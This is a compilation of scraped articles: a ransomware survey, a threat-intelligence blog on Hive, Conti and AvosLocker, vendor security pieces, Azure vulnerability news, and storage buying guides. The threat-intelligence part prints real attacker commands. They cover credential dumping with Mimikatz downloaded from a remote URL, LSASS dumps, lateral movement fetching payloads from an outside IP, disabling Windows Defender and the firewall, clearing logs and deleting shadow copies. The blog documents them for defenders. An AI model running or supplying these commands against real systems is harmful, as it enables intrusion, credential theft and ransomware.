The State of Ransomware 2022

Today Sophos has released the State of Ransomware 2022, its annual study of the real-world ransomware experiences of IT professionals working at the frontline around the globe.

The study has revealed an ever more challenging attack environment together with the growing financial and operational burden ransomware places on its victims. It also shines new light on the relationship between ransomware and cyber insurance, and the role insurance is playing in driving changes to cyber defenses.

This year, 5,600 IT professional from 31 countries participated in the research, with 965 sharing details of ransom payments made. Key findings include:

  • Ransom attacks are more frequent – 66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020
  • Ransom payments are higher – In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020, while the percentage of organizations paying less than $10,000 dropped to 21% from 34% in 2020. Overall, the average ransom paid by organizations that had data encrypted in their most significant ransomware attack, increased nearly fivefold to reach $812,360
  • More victims are paying the ransom – In 2021, 46% of organizations that had data encrypted in a ransomware attack paid the ransom. Twenty-six percent of organizations that were able to restore encrypted data using backups in 2021 also paid the ransom
  • The impact of a ransomware attack can be immense – The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. It took on average one month to recover from the damage and disruption. 90% of organizations said the attack had impacted their ability to operate, and 86% of private sector victims said they had lost business and/or revenue because of the attack
  • Many organizations rely on cyber insurance to help them recover from a ransomware attack – 83% of mid-sized organizations had cyber insurance that covers them in the event of a ransomware attack
  • Cyber insurance almost always pays out – In 98% of incidents where the victim had cyber insurance that covered ransomware, the insurer paid some or all the costs incurred (with 40% overall covering the ransom payment)
  • 94% of those with cyber insurance said that their experience of getting it has changed over the last 12 months, with higher demands for cybersecurity measures, more complex or expensive policies and fewer organizations offering insurance protection

“The findings suggest we may have reached a peak in the evolutionary journey of ransomware, where attackers’ greed for ever higher ransom payments is colliding head on with a hardening of the cyber insurance market as insurers increasingly seek to reduce their ransomware risk and exposure,” said Chester Wisniewski, principal research scientist at Sophos.

“In recent years, it has become increasingly easy for cybercriminals to deploy ransomware, with almost everything available as-a-service. Second, many cyber insurance providers have covered a wide range of ransomware recovery costs, including the ransom, likely contributing to ever higher ransom demands. However, the results indicate that cyber insurance is getting tougher and in the future ransomware victims may become less willing or less able to pay sky high ransoms. Sadly, this is unlikely to reduce the overall risk of a ransomware attack. Ransomware attacks are not as resource intensive as some other, more hand-crafted cyberattacks, so any return is a return worth grabbing and cybercriminals will continue to go after the low hanging fruit.”

To learn more, read the State of Ransomware 2022.

About the study

Sophos commissioned research agency Vanson Bourne to conduct an independent, vendor-agnostic survey of 5,600 IT professionals in mid-sized organizations (100-5,000 employees) across 31 countries. The survey was conducted during January and February 2022, and respondents were asked to respond based on their experiences over the previous year. Respondents were from Australia, Austria, Belgium, Brazil, Canada, chile, Colombia, Czech Republic, France, Germany, Hungary, India, Israel, Italy, Japan, Malaysia, Mexico, Netherlands, Nigeria, Philippines, Poland, Saudi Arabia, Singapore, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK, and US.

Source :

Ransomware: How Attackers are Breaching Corporate Networks

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.

Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:

  • Hive
  • Conti
  • Avoslocker

Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.

Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:

  • Gain persistence on the network
  • Escalate privileges
  • Tamper with and evade security software
  • Laterally move across the network

Initial Access

Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:

  • Spear phishing leading to the deployment of malware, including but not limited to:
    • IcedID
    • Emotet
    • QakBot
    • TrickBot
  • Taking advantage of weak RDP credentials
  • Exploiting vulnerabilities such as:
    • Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
    • FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
    • Apache Log4j vulnerabily – CVE-2021-44228

In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.


After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:

netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes

Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUserName /t REG_SZ /d <user> /f

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f


During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:

  • ADRecon – Gathers Active Directory information and generates a report
  • Netscan – Discovers devices on the network

Credential Access

Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:

powershell IEX((new-object net.webclient).downloadstring(‘<redacted>/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds

In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full

Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.

Lateral Movement

Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.

  • PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

  • WMI

wmic /node:@C:\share$\comps1.txt /user:”user” /password:”password” process call create “cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe”

  • BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll

  • Mimikatz

mimikatz.exe “privilege::debug” “sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>”

Defense Evasion

As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.

Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.


reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f


reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe delete aHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f

reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /

Disabling the default Windows firewall is also one of the techniques we have seen being used by these ransomware families:

netsh advfirewall set allprofiles state off

To cover their tracks on a victim system the actors may also clear the Windows event log:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command “Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }”


Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:

vssadmin.exe delete shadows /all /quiet

wmic.exe shadowcopy delete

We have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

In some instances the actors delete the safe mode settings in the registry to stop security product services from starting in safe mode:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f


Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:


We have also seen attackers use the following tools for data exfiltration:

  • Filezilla
  • Rclone


The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.

Symantec Protection

Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.

AV Protection

  • Ransom.Hive
  • Ransom.Conti
  • Ransom.AvosLocker
  • Backdoor.Cobalt
  • Hacktool.Mimikatz
  • Trojan.IcedID*
  • Trojan.Emotet*
  • W32.Qakbot*
  • Trojan.Trickybot*

 Behavioral Protection

  • SONAR.RansomHive!g2
  • SONAR.RansomHive!g3
  • SONAR.RansomHive!g4
  • SONAR.RansomAvos!g2
  • SONAR.RansomConti!g1
  • SONAR.RansomConti!g3
  • SONAR.RansomConti!g4
  • SONAR.Ransomware!g30
  • SONAR.RansomGregor!g1
  • SONAR.SuspLaunch!gen4
  • SONAR.SuspLaunch!g18
  • SONAR.Ransom!gen59
  • SONAR.Ransomware!g26
  • SONAR.Cryptlck!g171

Intrusion Prevention System (IPS) detections

IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.

The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.

Symantec recommends that you have intrusion prevention enabled on all your devices including servers.

Adaptive Protection

Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.


  • Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
  • Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
  • Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
  • Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.

    Source :

5 benefits of integrating corporate SIEM systems

A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.  

A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts. 

The main benefits of having corporate SIEM systems are as follows:  

  • A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources. 
  • It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.  
  • It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company. 
  • It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators incorporate the function of creating an event before a change to the company’s maintenance activities log, as well as in Windows. Then if there is any malicious activity they can decide whether or not to validate these adjustments. 
  • It provides cyberattack control and protection in order to act before it becomes an irreversible problem, filtering whether it is a real attack or a false alarm. Known or unknown attacks are analyzed whether they are malwareless attacks (which resort to the legitimate tools of the system itself) or DDoS attacks or advanced persistent threats (APTs). 

In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.  

In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before causing a slowdown or a total company service outage. 

Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate. 

Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EDPR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making. 

Source :

Microsoft Azure Vulnerability Exposes PostgreSQL Databases to Other Customers

Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region.

“By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers’ databases,” Microsoft Security Response Center (MSRC) said.

New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain “ExtraReplica.” Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022.

Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target’s Azure region and exfiltrate sensitive information.

In other words, successful exploitation of the critical flaws could have enabled an adversary to gain unauthorized read access to other customers’ PostgreSQL databases, effectively circumventing tenant isolation.

Wiz traced the privilege escalation to a bug stemming as a result of modifications introduced in the PostgreSQL engine to harden its privilege model and add new features. The name ExtraReplica comes from the fact that the exploit leverages a PostgreSQL feature that permits copying database data from one server to another, i.e., “replicating” the database.

The Windows maker described the security vulnerability as affecting PostgreSQL Flexible Server instances deployed using the public access networking option, but stressed that it did not find evidence of the flaw being actively exploited and that no customer data was accessed.

“No action is required by customers,” MSRC said. “In order to further minimize exposure, we recommend that customers enable private network access when setting up their Flexible Server instances.”

Source :

Everything you need to know to create a Vulnerability Assessment Report

You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”

Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.

As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s drive straight in.

What is a Vulnerability Assessment Report and why do you need one?

A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.

A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.

The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:

— Customers need to trust you

Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.

It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.

— The Board wants a better understanding of the business’ risk

Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.

— Your auditors are checking for compliance

Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.

— Your CFO is renewing your cyber insurance

It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.

How often do you need to produce a vulnerability assessment report?

Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.

Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.

Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.‍

A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.

What should be included in a vulnerability assessment report?

Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.

As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.

Where can you get a Vulnerability Assessment Report from?

Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.

Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.

Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.

At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.

Source :

Are bigger SSD’s faster?

It’s possible you’ve read somewhere or someone gave you the following advice: a bigger SSD is faster. That is correct. If you take a specific SSD drive model and compare its 250 GB size variant to the 1 TB variant, the bigger one will be faster.

Again, I can’t stress this enough: we’re talking about the same model from the same manufacturer – only the size differs.

In this whole idea, we’re talking about comparing something like the Kingston A400 240 GB model to the Kingston A400 960 GB model. In this example, even the manufacturer stats about 100 MB/s faster write performance.

Ok, but why is a bigger SSD faster?

To put it simply, a bigger SSD has more NAND chips ranks and more channels that they can use in parallel. This leads to faster data transfer. This is a lame simplified explanation.

This of course, varies from manufacturer to manufacturer and that is because there are different controllers out there, different things a manufacturer can do in the SSD’s firmware and so on. But usually, you’ll see a measurable difference between the low capacity drives and the higher capacity ones.

Consider the DRAM Cache

The way an SSD uses its cache is by placing data in this lower-latency area, called the cache, so future requests for that data can occur much faster. These caches are usually of two types: DRAM Cache or SLC Cache.

Fast SSDs, usually have a DRAM cache. The controller of the SSD actually has this dynamic random-access memory (DRAM). Do not confuse this with the SLC cache.

Why would you care? Well, bigger SSDs have a bigger DRAM cache. Just check Samsung’s datasheet for the 870 EVO – on page 3 you’ll see the 1TB, 2TB, and 4TB have bigger and bigger DRAM caches than the 250/500GB drives.

that is the DRAM cache. Its an additional chip!

DRAM Cache and SLC Cache are completely different animals. Yes they both do the ‘cache’ action. They both have the purpose of accelerating the drive’s speed, but the cost and logic are different.

A DRAM cache is basically a separate chip in the PCB of your SSD. This DRAM chip is responsible for the work in your SSD, just as your system RAM is responsible for the operation of your PC. It temporarily stores data for the purpose of accelerating processing.

And because of the temporary storage function of the DRAM cache, many read and write processes can directly use the data in this cache – and it is a lot faster than starting from the beginning.

When we’re talking about the SLC cache, it is not a separate chip. Because it is called a cache and it is not really a true SLC NAND Flash chip, but a part of the space in the TLC or QLC’s NAND Flash IC, it simulates the SLC writing method. It simulates it as in it writes only 1 bit of data in each cell. This does improve the read/write performance of the SSD. But not as long or as much as a DRAM cache.

But! For an SSD without a DRAM cache, just a SLC Cache, the speeds will drop dramatically after that cache is exhausted from sequential writes – thye drop to the original value of the TLC NAND Flash. For these types of SSDs, without a DRAM cache, usually the indicated read/write speed in the tech specs are measured using the SLC Cache. (the test does not get to saturate the SLC cache and the average speed is higher. But if it were to be really tested, we’d see lower numbers once the SLC Cache can’t keep up)

The bottom line is: a drive without a DRAM Cache will not be able to sustain those advertised speeds for long.

Plus, a bigger DRAM Cache means you can abuse that drive more. By abusing, I mean giving it heavy workloads like a lot of writes/reads at once.

My 2cents? Never buy a DRAM-less SSD. SSDs that have a DRAM cache are so cheap nowadays it does not make sense to trade off the performance. Heck, I’ve seen DRAM-less SSDs a couple of bucks more expensive than the ones with a DRAM cache. I don’t know why.

How to tell if that SSD has a DRAM cache?

Just look up the datasheet on the manufacturer’s website. PCpartpicker also sometimes lists this specification in the Cache column.

If I’m in a hurry, if the manufacturer does not say anything about the DRAM cache, I will assume it has none. If I really want to know, just Google some review of that model.

TBW – total bytes written

A specification where bigger drives win again, as they allow for more writes before failure.

To be fair, a normal gamer/user will probably never saturate this even if we’re talking about a small drive. It takes a lot of work to actually write so much data and usually… you’ll probably want to upgrade to a bigger or faster drive before your old SSD will fial.

Nonetheless, it is worth mentioning that the TBW figure is also bigger in a bigger SSD.

Always try to buy bigger and with DRAM Cache

Enough said. Spending a little more for a bigger drive with a DRAM cache is always worth it. Always!

Examples of popular SSDs that do have a DRAM cache:

  • Samsung 870 EVO, 860 EVO, 850 EVO, 860 PRO, 980 PRO, 960 PRO, 970 EVO drives
  • Crucial MX500 drives
  • Gigabyte Aorus Gen4 7000s
  • Patriot Ignite 960 GB
  • Kingston A2000 M.2

Do note that the list above is not complete. I’m sure I’ve missed some. Those are just some popular drives that I can actually recommend if you are looking for suggestions on what to buy – and always strive to get the biggest capacity you can afford!

Final thoughts

If there is something to remember from this whole article is this: buy as big as your budget allows you and always buy an SSD that has a DRAM Cache. These two ideas will guarantee that you’ll not be disappointed with your new SSD.

Source :

CMR vs SMR drives – what to pick? How to tell?

Buying a hard disk used to be quite easy. Now we have stuff like CMR vs SMR drives, manufacturers not being completely clear in their product showcase pages, and so on.

TLDR: To keep things short, you should strive to buy a CMR drive because SMR drives, while they work just fine, are usually slower in every typical individual test carried by a lot of people out there. SMR drives are slower as their method of writing data aims for storage density, and one of the drawbacks of this goal is speed.

And before we continue, yes, even if manufacturers have developed firwmare that optimize the read and write performance for SMR drives, they are still not that great as a CMR drive.

Tip: some great benchmarks for hard disk drives are: Crystal Disk Mark, ATTO Disk Benchmark, HD Tune, and even PCMark has some storage benchmarks.

CMR or PMR drives – how they work

CMR comes from Conventional Magnetic Recording. It is also known as PMR that comes from Perpendicular Magnetic Recording.

The way CMR works is by aligning the poles of the magnetic elements, which represent bits of data perpendicularly to the surface of the disk. The magnetic tracks are written side-by-side without overlapping.

a great image explanation from Synology for CMR / PMR drives

And because the write head is usually quite large in comparison to the read head, HDD manufacturers aim to shrinking the size of the write head – or do it as much as possible.

SMR – how do these drives work?

Shingled Magnetic Recording, or SMR, is an extension to PMR. It basically offers improved density. And this happens because rather than writing each magnetic track without overlapping, SMR overlaps each new track with part of the previous track. One way to think about it is by comparing it to the shingles on a roof.

a great image explanation from Synology for SMR drives

By overalapping the tracks, write heads become a lot thinner, and we get a bigger areal density.

CMR vs SMR drives – why does it actually matter?

In short, because you want the best performance for your dollar.

But to get a little bit more technical, regardless of whether an HDD uses CMR or SMR when some new data is written on the drive, the tracks are fully readable without performance impact.

So we have a pretty good read speed, right? No matter what we choose? Right? Kind of. Not really. Well, it depends on how you use the drive.

But! On an SMR drive, when any data is edited or overwritten, the write head will not overwrite data on the existing magnetic track. It will write the new data on an empty area of the disk. While the original track with the old data will temporarily sit put. Then, when the SMR HDD becomes idle, it will enter a ‘reorganization mode’, where the old bits of data on the original track are being erased and made available for future use.

This reorganization procedure must occur and makes idle time essential on an SMR drive. If you hit the respective SMR drive hard with write and read operations, it won’t get to do this in a fast way, and the drive will have to write new data and reorganize stuff at the same time. This causes an impact on the overall read and write performance of the drive.

How can I tell if the HDD I want to buy is SMR or CMR?

Some manufacturers make it easy, some not so much. But basically, searching with something like ‘product code SMR or CMR’ on Google will lead you to a good result most of the time.

Now, Western Digital, on their homepage in the shop section, actually lists CMR or SMR for their drives in the ‘Full Specifications’ area, at the Recording Technology specification. Neat!

For Seagate, however, you have to go to the product page, and download the PDF datasheet. Oh well, I guess it works.

Here’s a breakdown of what is what usually, at least for the common models. Please, search online or on the manufacturer’s website in case the below data becomes outdated. It was last looked up in 29.01.2022, on the manufacturers’ websites, just so you know.

ManufacturerModelCapacityRecording technology
SeagateIron Wolf Pro*1AnyCMR
SeagateIron Wolf*2AnyCMR
SeagateBarracuda Compute*3AnySMR
Western DigitalPurple*4AnyCMR
Western DigitalRed Plus*5AnyCMR
Western DigitalRed – WD20EFAX2 TBSMR
Western DigitalRed – WD30EFAX3 TBSMR
Western DigitalRed – WD40EFAX4 TBSMR
Western DigitalRed – WD60EFAX6 TBSMR

*1 = ST4000NE001, ST6000NE000, ST8000NE001, ST10000NE000, ST10000NE0008, ST12000NE0008, ST14000NE0008, ST16000NE000, ST18000NE000, ST20000NE000

*2 = ST1000VN002, ST2000VN004, ST3000VN007, ST3000VN006, ST4000VN008, ST4000VN006, ST6000VN001, ST8000VN004, ST10000VN000, ST10000VN0008, ST12000VN0008

*3 = ST500LM030, ST500LM034, ST1000LM048, ST1000LM049, ST2000LM015, ST3000LM024, ST4000LM024, ST5000LM000



When does buying a SMR drive make sense?

My opinion is that never.

But if you get an amazing price, and you know that hard drive will not get a lot of writes, edits, and deletions… well, it might make sense since the actual heavy usage of erasing,editing and writing data is causing the ‘slowness’. Like if you were to just fill it up with movies and that’s it. Those movies will not get edited, deleted or anything – they will just be read when you watch them. I guess – thinking about selfhosting something like Plex or Nextcloud… or a DIY NAS. I’d still opt for a CMR drive – what kind of discount are we talking about, to be fair? 10% is not worth it in my opinion.

Closing thoughts

Basically, aim for a CMR drive. And if you are new to the whole computer parts upgrade or stuff… don’t stress if you are buying a NAS drive for your desktop PC. It does not matter, it will work the same – maybe even last longer!

Hard disk buying is now as tedious as buying another component, I guess – one more thing to look for besides the usual specifications. I do hope that testing, developing, and working with diverse methods and technologies of storing data will eventually lead to manufacturers developing more performant and higher density hard disks. Just imagine a 100 TB HDD! That would be insane.

I hope this article helped you figure out what you need – an SMR or a CMR drive and why it matters.

Source :

How to Defer Parsing of JavaScript Properly + WordPress Fix [Updated Guide]

Learn how to Defer Parsing of JavaScript to improve pagespeed score. And how you can fix ‘Eliminate render-blocking of JavaScript’ warning in Google PageSpeed Insights by deferring non-critical JavaScript(s). The newer version of Google PageSpeed Insight refers to this issue as ‘Eliminate render-blocking resources’; these render-blocking resources may include JavaScripts and CSS.

